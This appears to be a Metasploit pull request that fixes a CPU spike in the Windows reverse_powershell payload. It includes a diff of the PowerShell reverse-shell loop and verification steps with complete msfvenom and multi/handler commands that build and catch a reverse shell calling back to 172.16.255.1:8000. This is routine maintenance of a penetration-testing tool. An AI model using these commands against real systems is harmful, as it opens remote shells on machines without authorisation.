### PR TITLE
Fix psh template to avoid 100% cpu spike on CTRL+C

### DIFF
--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1204
+  CachedSize = 1228
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -81,7 +81,8 @@ module MetasploitModule
           "while (($i -gt 0) -and ($pos -lt $nb.Length)) {"\
             "$r=$s.Read($nb,$pos,$nb.Length - $pos);"\
             "$pos+=$r;"\
-            "if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}};"\
+            "if (-not $pos -or $pos -eq 0) {RSC};"\
+            "if ($nb[0..$($pos-1)] -contains 10) {break}};"\
             "if ($pos -gt 0){"\
               "$str=$e.GetString($nb,0,$pos);"\
               "$is.write($str);start-sleep 1;"\


### PR DESCRIPTION
As mentioned in #7293, using the `reverse_powershell` and exiting the shell without typing `exit` (eg, by pressing `CTR+C` and terminating the shell, or killing it via `sessions -[K|k]`) would result in the Powershell process burning the CPU to 100%.

This PR includes a tweak to the Powershell payload that makes this problem go away.

## Verification

- [x] Create a payload: `$ msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.255.1 LPORT=8000 -f raw -o ~/scratch/met/ps-cmd.bat`
- [x] Create a matching listener: `$ msfconsole -q -x 'use exploit/multi/handler; set payload cmd/windows/reverse_powershell; set LHOST 172.16.255.1; set LPORT 8000; set ExitOnSession false; run -j'`
- [x] Run the payload bat file on a Windows target that has powershell installed.
- [x] Confirm a working session appears.
- [x] Interact with the session, run commands, then type `exit`.
- [x] **Verify** that the Powershell process terminates completely.
- [x] Run the payload bat file again.
- [x] Confirm a working session appears.
- [x] Run `sessions -K` to kill the session without interacting with it (or interact and press `CTRL+C` and terminate)
- [x] **Verify** that the Powershell process terminates completely.

Fixes #7293.